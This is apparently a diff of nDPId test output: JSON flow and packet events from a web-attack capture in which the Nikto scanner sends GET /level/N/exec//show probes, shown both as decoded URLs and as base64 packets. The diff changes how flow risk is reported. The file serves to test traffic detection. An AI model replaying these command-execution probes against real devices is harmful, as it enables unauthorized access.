+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":583,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":583,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277612,"flow_last_seen":1576420277612,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277612,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50728,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/35\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001282)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":584,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":584,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277614,"flow_last_seen":1576420277614,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277614,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50730,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":584,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":584,"flow_packet_id":1,"flow_last_seen":1576420277614,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277614,"pkt":"AAAAAAAAAAAAAAAACABFAADIgnNAAEAGubp\/AAABfwAAAcYqH5AJ3LqL6hJPloAYAED+vAAAAQEICp1m\/pWdZv6VR0VUIC9sZXZlbC8zNi9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyODMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":584,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":584,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277614,"flow_last_seen":1576420277614,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277614,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50730,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/36\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001283)"}}
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":584,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":584,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277614,"flow_last_seen":1576420277614,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277614,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50730,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/36\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001283)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":585,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":585,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277615,"flow_last_seen":1576420277615,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277615,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50732,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":585,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":585,"flow_packet_id":1,"flow_last_seen":1576420277615,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277615,"pkt":"AAAAAAAAAAAAAAAACABFAADIj29AAEAGrL5\/AAABfwAAAcYsH5DrNbeX8ap25oAYAED+vAAAAQEICp1m\/pedZv6XR0VUIC9sZXZlbC8zNy9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjg0KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":585,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":585,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277615,"flow_last_seen":1576420277615,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277615,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50732,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/37\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001284)"}}
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":585,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":585,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277615,"flow_last_seen":1576420277615,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277615,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50732,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/37\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001284)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":586,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":586,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277616,"flow_last_seen":1576420277616,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277616,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50734,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":586,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":586,"flow_packet_id":1,"flow_last_seen":1576420277616,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277616,"pkt":"AAAAAAAAAAAAAAAACABFAADImrpAAEAGoXN\/AAABfwAAAcYuH5CDY6JF2zT1KYAYAED+vAAAAQEICp1m\/pidZv6YR0VUIC9sZXZlbC8zOC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyODUpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":586,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":586,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277616,"flow_last_seen":1576420277616,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277616,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50734,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/38\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001285)"}}
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":586,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":586,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277616,"flow_last_seen":1576420277616,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277616,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50734,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/38\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001285)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":587,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":587,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277618,"flow_last_seen":1576420277618,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277618,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50736,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":587,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":587,"flow_packet_id":1,"flow_last_seen":1576420277618,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277618,"pkt":"AAAAAAAAAAAAAAAACABFAADIUbFAAEAG6nx\/AAABfwAAAcYwH5C3PmlUu95eg4AYAED+vAAAAQEICp1m\/pqdZv6aR0VUIC9sZXZlbC8zOS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyODYpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":587,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":587,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277618,"flow_last_seen":1576420277618,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277618,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50736,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/39\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001286)"}}
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":587,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":587,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277618,"flow_last_seen":1576420277618,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277618,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50736,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/39\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001286)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":588,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":588,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277619,"flow_last_seen":1576420277619,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277619,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50738,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":588,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":588,"flow_packet_id":1,"flow_last_seen":1576420277619,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277619,"pkt":"AAAAAAAAAAAAAAAACABFAADI5L9AAEAGV25\/AAABfwAAAcYyH5D7t9xCdJSM64AYAED+vAAAAQEICp1m\/pudZv6bR0VUIC9sZXZlbC80MC9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjg3KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":588,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":588,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277619,"flow_last_seen":1576420277619,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277619,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50738,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/40\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001287)"}}
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":588,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":588,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277619,"flow_last_seen":1576420277619,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277619,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50738,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/40\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001287)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":589,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":589,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277622,"flow_last_seen":1576420277622,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277622,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50740,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":589,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":589,"flow_packet_id":1,"flow_last_seen":1576420277622,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277622,"pkt":"AAAAAAAAAAAAAAAACABFAADIjX9AAEAGrq5\/AAABfwAAAcY0H5DiALWBzWdeg4AYAED+vAAAAQEICp1m\/p6dZv6eR0VUIC9sZXZlbC80MS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyODgpDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":589,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":589,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277622,"flow_last_seen":1576420277622,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277622,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50740,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/41\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001288)"}}
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":589,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":589,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277622,"flow_last_seen":1576420277622,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277622,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50740,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/41\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001288)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":590,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":590,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277624,"flow_last_seen":1576420277624,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277624,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50742,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00672{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":590,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":590,"flow_packet_id":1,"flow_last_seen":1576420277624,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277624,"pkt":"AAAAAAAAAAAAAAAACABFAADIagJAAEAG0it\/AAABfwAAAcY2H5Bh+1L\/IgWJKIAYAED+vAAAAQEICp1m\/p+dZv6fR0VUIC9sZXZlbC80Mi9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyODkpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":590,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":590,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277624,"flow_last_seen":1576420277624,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277624,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50742,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/42\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001289)"}}
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":590,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":590,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277624,"flow_last_seen":1576420277624,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277624,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50742,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/42\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001289)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":591,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":591,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277625,"flow_last_seen":1576420277625,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277625,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50744,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00672{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":591,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":591,"flow_packet_id":1,"flow_last_seen":1576420277625,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277625,"pkt":"AAAAAAAAAAAAAAAACABFAADI3axAAEAGXoF\/AAABfwAAAcY4H5AuBeVV4Hsa\/oAYAED+vAAAAQEICp1m\/qGdZv6hR0VUIC9sZXZlbC80My9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyOTApDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":591,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":591,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277625,"flow_last_seen":1576420277625,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277625,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50744,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/43\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001290)"}}
